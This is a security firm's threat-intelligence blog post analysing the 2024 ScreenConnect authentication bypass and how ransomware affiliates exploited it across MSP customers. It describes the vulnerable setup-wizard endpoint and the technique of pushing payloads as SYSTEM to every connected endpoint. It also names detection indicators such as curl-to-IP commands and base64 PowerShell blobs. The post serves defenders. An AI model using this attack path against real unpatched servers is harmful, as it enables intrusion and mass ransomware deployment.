ScreenConnect CVE-2024-1709: The MSP Blast Radius

Threat Intelligence

An authentication bypass in ConnectWise ScreenConnect handed ransomware affiliates direct admin on thousands of MSP servers. The damage propagated through the customers, not the product.

By Arjun Raghavan, Security & Systems Lead, BIPI · May 3, 2024 · 8 min read

On February 19, 2024, ConnectWise disclosed CVE-2024-1709, a critical authentication bypass in self-hosted ScreenConnect (CVSS 10.0), paired with CVE-2024-1708, a path traversal. Within 24 hours, public PoCs were live and ransomware affiliates were mass-exploiting unpatched instances. Because ScreenConnect is the remote-management backbone for managed service providers, every compromised server was a launchpad into dozens or hundreds of downstream small business networks.

Timeline

ConnectWise pushed the patch on February 13 to cloud customers and February 19 to on-prem. Huntress reverse-engineered the patch and published a write-up the next day, including a one-request exploit creating a new admin user via the /SetupWizard.aspx endpoint. By February 22, Huntress was tracking active exploitation across hundreds of MSP environments. Within ten days, Black Basta, Bl00dy, and LockBit affiliates were using the bug as their primary access vector for that period.

Root cause: setup wizard trust

The bug was almost embarrassingly simple. The setup wizard endpoint was reachable after installation and did not verify that setup was complete. An unauthenticated POST to that endpoint created a new SuperAdmin account. No CVE detective work, no chained primitives. One request, full admin, full code execution via ScreenConnect's built-in scripting.

Attacker actions

Once an affiliate had SuperAdmin, the kill chain was trivial. ScreenConnect lets an admin push arbitrary commands or files to every connected endpoint as SYSTEM. Affiliates used that primitive to deploy ransomware payloads (Black Basta, Bl00dy, LockBit-branded lockers) across all the MSP's customer endpoints simultaneously. For one compromised MSP, that meant 30, 50, or 200 downstream businesses encrypted at the same hour. Some affiliates skipped ransomware entirely and went straight for data theft, dumping QuickBooks files and customer databases from each endpoint.

Detection

The high-fidelity signal was new admin user creation on the ScreenConnect server. Huntress shipped a script to enumerate User.xml on the server filesystem and flag entries that did not match expected staff. The second signal was unusual ScreenConnect script execution: PowerShell payloads, base64 blobs, or curl-to-IP-address commands fanning out to every connected endpoint inside a short window. Any MSP with EDR visibility on customer endpoints saw the same parent process (ScreenConnect.ClientService.exe) spawning unusual children across dozens of tenants at the same moment.

Lessons

The product was the supply chain. MSPs sit in a structurally privileged position: one compromise reaches every customer. That model demands controls customers normally apply to their own crown jewels. MFA on every admin account, conditional access by IP, alerting on new admin creation, network egress allowlists, and out-of-band patching SLAs measured in hours. Several MSPs hit during this wave did not have MFA on ScreenConnect at all. The auth bypass would still have failed them, but post-patch credential reuse from leaked admin accounts would have been blunted.

The second lesson is for the downstream customers. If your MSP gets to push code to your endpoints, your endpoint security posture is gated on theirs. Asking your MSP for evidence that ScreenConnect, NinjaOne, Kaseya, or whatever they use is patched, MFA-enforced, and logged is reasonable due diligence, not paranoia.

The BIPI take

RMM tools are the highest-leverage targets in the SMB ecosystem. The CVE-2024-1709 wave was not novel tradecraft; it was the predictable consequence of concentrating remote SYSTEM execution across thousands of organizations in a small number of self-hosted servers. Treat your RMM the way you would treat a domain controller. Treat your MSP's RMM the way you treat any vendor that can run code in your environment, which is to say: with a contract clause and a question list.

Read more field notes, explore our services, or get in touch at info@bipi.in. Privacy Policy · Terms.